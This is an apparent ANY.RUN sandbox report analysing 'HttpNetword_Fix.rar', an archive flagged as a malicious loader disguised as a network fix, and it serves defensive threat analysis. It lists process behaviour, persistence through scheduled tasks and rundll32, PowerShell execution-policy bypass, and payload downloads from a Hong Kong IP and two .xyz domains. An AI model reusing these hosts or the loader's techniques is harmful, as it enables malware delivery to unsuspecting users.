File name:

HttpNetword_Fix.rar

Full analysis: https://app.any.run/tasks/37d8b38c-3d49-4d19-91d6-51075d3d0d5e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: July 04, 2025, 14:57:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
loader
delphi
inno
installer
auto
generic
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

E259140EEADED9A8B5FCCC481CC14819

SHA1:

8BC4371983DDFD1BB2A21BE23FD2CE788C192685

SHA256:

837AAECB4D3D06C90B4955E525FB3E8EEDBED0E6F46EA8D383815E0D60957579

SSDEEP:

98304:l+w4SphcigRHL2w0D2SqZviAWX+M2uR22sLxTSGzX92wQgvTTCGt66F2ZfNDAdXQ:c3y9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4520)
      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 5244)

    • GENERIC has been found (auto)

      • powershell.exe (PID: 5244)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 4460)

  • SUSPICIOUS

    • The process drops C-runtime libraries

      • WinRAR.exe (PID: 4788)

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 4788)
      • cmd.exe (PID: 4460)

    • Reads security settings of Internet Explorer

      • smss.exe (PID: 4888)
      • 1Htest.tmp (PID: 4764)
      • smss.exe (PID: 4644)
      • WinRAR.exe (PID: 4788)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Executes application which crashes

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Executable content was dropped or overwritten

      • 1Htest.exe (PID: 5716)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • unins000.exe (PID: 3788)
      • cmd.exe (PID: 4460)
      • _iu14D2N.tmp (PID: 5060)

    • Reads the Windows owner or organization settings

      • 1Htest.tmp (PID: 3952)
      • _iu14D2N.tmp (PID: 5060)

    • Starts CMD.EXE for commands execution

      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • WinRAR.exe (PID: 4788)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4520)
      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)

    • Found IP address in command line

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 5244)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 4520)

    • Connects to the server without a host name

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)

    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 6768)

    • The process executes Powershell scripts

      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)

    • Application launched itself

      • powershell.exe (PID: 4816)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 5244)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 6768)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 6768)
      • WinRAR.exe (PID: 4788)

    • The process executes via Task Scheduler

      • rundll32.exe (PID: 2428)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Detected use of alternative data streams (AltDS)

      • _iu14D2N.tmp (PID: 5060)

    • Starts itself from another location

      • unins000.exe (PID: 3788)

    • Starts application with an unusual extension

      • unins000.exe (PID: 3788)

    • Connects to unusual port

      • mmgaserver.exe (PID: 1336)

    • The process creates files with name similar to system file names

      • cmd.exe (PID: 4460)

    • Uses TASKKILL.EXE to kill process

      • _iu14D2N.tmp (PID: 5060)

  • INFO

    • Manual execution by a user

      • smss.exe (PID: 4888)
      • setup安装6.exe (PID: 684)
      • setup安装6.exe (PID: 4684)
      • 1Htest.exe (PID: 5716)

    • The sample compiled with english language support

      • WinRAR.exe (PID: 4788)
      • cmd.exe (PID: 4460)

    • Checks supported languages

      • smss.exe (PID: 4888)
      • setup安装6.exe (PID: 4684)
      • 1Htest.exe (PID: 5716)
      • 1Htest.tmp (PID: 4764)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • smss.exe (PID: 4644)
      • MpCmdRun.exe (PID: 952)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Reads the computer name

      • smss.exe (PID: 4888)
      • 1Htest.tmp (PID: 4764)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • smss.exe (PID: 4644)
      • MpCmdRun.exe (PID: 952)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Checks proxy server information

      • smss.exe (PID: 4888)
      • WerFault.exe (PID: 5424)
      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)
      • rundll32.exe (PID: 2428)
      • WerFault.exe (PID: 6368)
      • smss.exe (PID: 4644)
      • WerFault.exe (PID: 760)
      • slui.exe (PID: 4664)
      • smss.exe (PID: 4676)
      • smss.exe (PID: 888)
      • WerFault.exe (PID: 2760)

    • Reads the machine GUID from the registry

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)

    • Reads the software policy settings

      • smss.exe (PID: 4888)
      • WerFault.exe (PID: 5424)
      • WerFault.exe (PID: 6368)
      • smss.exe (PID: 4644)
      • slui.exe (PID: 4664)
      • WerFault.exe (PID: 760)
      • smss.exe (PID: 4676)
      • smss.exe (PID: 888)
      • WerFault.exe (PID: 2760)

    • Create files in a temporary directory

      • 1Htest.exe (PID: 5716)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • MpCmdRun.exe (PID: 952)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 5424)
      • rundll32.exe (PID: 2428)
      • WerFault.exe (PID: 6368)
      • WerFault.exe (PID: 760)
      • WerFault.exe (PID: 2760)

    • The sample compiled with chinese language support

      • 1Htest.exe (PID: 5716)
      • 1Htest.tmp (PID: 3952)
      • 1Htest.exe (PID: 2320)
      • unins000.exe (PID: 3788)
      • WinRAR.exe (PID: 4788)

    • Process checks computer location settings

      • 1Htest.tmp (PID: 4764)
      • _iu14D2N.tmp (PID: 5060)

    • Creates files in the program directory

      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • cmd.exe (PID: 4460)

    • Creates a software uninstall entry

      • 1Htest.tmp (PID: 3952)

    • Disables trace logs

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)

    • Detects InnoSetup installer (YARA)

      • 1Htest.tmp (PID: 3952)

    • Compiled with Borland Delphi (YARA)

      • 1Htest.tmp (PID: 3952)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)

    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 2428)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 4788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 1057931
UncompressedSize: 1717385
OperatingSystem: Win32
ArchivedFileName: HttpNetword_Fix/1Htest.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
185
Monitored processes
37
Malicious processes
9
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe smss.exe werfault.exe setup安装6.exe no specs setup安装6.exe conhost.exe no specs 1htest.exe 1htest.tmp no specs 1htest.exe 1htest.tmp cmd.exe no specs conhost.exe no specs powershell.exe powershell.exe cmd.exe conhost.exe no specs #GENERIC powershell.exe powershell.exe no specs powershell.exe no specs schtasks.exe no specs schtasks.exe no specs rundll32.exe unins000.exe _iu14d2n.tmp taskkill.exe no specs conhost.exe no specs mmgaserver.exe smss.exe werfault.exe slui.exe cmd.exe no specs conhost.exe no specs mpcmdrun.exe no specs smss.exe werfault.exe smss.exe werfault.exe

Process information

PID
CMD
Path
Indicators
Parent process
420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
684"C:\Users\admin\Desktop\setup安装6.exe" C:\Users\admin\Desktop\setup安装6.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\setup安装6.exe
c:\windows\system32\ntdll.dll
760C:\WINDOWS\SysWOW64\WerFault.exe -u -p 888 -s 1928C:\Windows\SysWOW64\WerFault.exe
smss.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
888"C:\Users\admin\Desktop\smss.exe"C:\Users\admin\Desktop\smss.exe
svchost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
Modules
Images
c:\users\admin\desktop\smss.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
952"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR4788.41405"C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
4.18.1909.6 (WinBuild.160101.0800)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
1336mmgaserver.exeC:\Windows\SysWOW64\mmgaserver.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
MMGA Server
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mmgaserver.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
2320"C:\Users\admin\Desktop\1Htest.exe" /SPAWNWND=$7033C /NOTIFYWND=$F0330 C:\Users\admin\Desktop\1Htest.exe
1Htest.tmp
User:
admin
Company:
Integrity Level:
HIGH
Description:
静默安装测试包 Setup
Exit code:
0
Version:
Modules
Images
c:\users\admin\desktop\1htest.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
2428"C:\WINDOWS\SysWOW64\rundll32.exe" C:\Users\admin\AppData\Local\Microsoft\ExecutionHuiOne\ExecutionHuiOne.dll,EntryHUIOneC:\Windows\SysWOW64\rundll32.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
2632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetaskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2668C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR4788.41405\Rar$Scan51498.bat" "C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events
69 047
Read events
69 003
Write events
43
Delete events
1

Modification events

(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\HttpNetword_Fix.rar
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(4788) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList
Operation:writeName:ArcSort
Value:
32
(PID) Process:(3952) 1Htest.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\静默安装测试包_is1
Operation:writeName:Inno Setup: Setup Version
Value:
6.2.0
Executable files
18
Suspicious files
6
Text files
26
Unknown types
5

Dropped files

PID
Process
Filename
Type
5424WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_smss.exe_24a43df87c62da7d4242a72fa816da0ac8962_d7e1bf78_69a36f8b-afd3-425b-86bc-39aa830800f0\Report.wer
MD5:
SHA256:
39521Htest.tmpC:\Program Files (x86)\csDemo\unins000.exeexecutable
MD5:86D32F3E0F58A0B23FB970B661F1F02D
SHA256:71E42F1916C9CEC1F7F151E950E8594A41752F91708E5F33B99EFE0252B637B5
23201Htest.exeC:\Users\admin\AppData\Local\Temp\is-OOLK4.tmp\1Htest.tmpexecutable
MD5:DBC4BDA50ED3CEECDC51CB85B80FD698
SHA256:C78A8AC45604D237CA62486F4305A8CFAD1E4A8843A7EFE06384CD570D4966B0
5424WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER6AFE.tmp.dmpdmp
MD5:2DE0284902D08A334185402BEE2BD7AE
SHA256:F4D14E5048BDD912F88DDC1DD6170FCA753A39AB89DA2E4ACECF2C41EB7C7740
5424WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER6BEB.tmp.xmlxml
MD5:D61B236BE58808F9B5375755FA45230A
SHA256:E114D15330D5B48F68556B9445FABECE39FAA25A1711D514DD8291FE016D830F
5424WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDA.tmp.WERInternalMetadata.xmlxml
MD5:4E2234DDB82D12D6B897867E98062CA2
SHA256:A0609169D9D8C7EB634E1B41AB945457E7BD288EE94A7E7AE5D9EF98A89831A4
39521Htest.tmpC:\Users\admin\AppData\Local\Temp\is-JN1PA.tmp\_isetup\_setup64.tmpexecutable
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
4816powershell.exeC:\Users\Public\Documents\1h.ps1text
MD5:28E8F7FB40F602B54AB47A699A853741
SHA256:39DDBDCC117673EEECCD18FA7617E712BD8E609AB3952CF35931814C766D486F
6768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_od0kfq4h.mph.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v5dm3cmj.u3b.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
46
TCP/UDP connections
69
DNS requests
26
Threats
16

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4860
RUXIMICS.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
RU
binary
825 b
whitelisted
1268
svchost.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
RU
binary
825 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
POST
200
40.126.31.128:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
4860
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
POST
400
20.190.159.2:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
POST
400
20.190.159.2:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
POST
400
20.190.159.71:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
POST
400
40.126.31.1:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
4816
powershell.exe
GET
200
101.32.22.108:80
http://101.32.22.108/1/1h.txt
HK
text
245 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4860
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.16.168.124:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
4860
RUXIMICS.exe
2.16.168.124:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4860
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.78
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.181.156
whitelisted
www.660982.xyz
  • 38.147.186.138
unknown
watson.events.data.microsoft.com
  • 13.89.179.12
  • 20.189.173.21
  • 40.69.146.102
  • 104.40.67.196
whitelisted
login.live.com
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.71
  • 20.190.159.129
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.4
  • 40.126.31.1
  • 20.190.159.73
  • 20.190.159.2
  • 20.190.159.0
  • 40.126.31.67
whitelisted
nexusrules.officeapps.live.com
  • 52.111.227.13
whitelisted
dow.601219.xyz
  • 101.32.22.108
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

PID
Process
Class
Message
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
4816
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
4816
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
4816
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6768
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6768
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6768
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
6768
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6768
powershell.exe
Misc activity
ET INFO Packed Executable Download
6768
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
HttpNetword_Fix.rar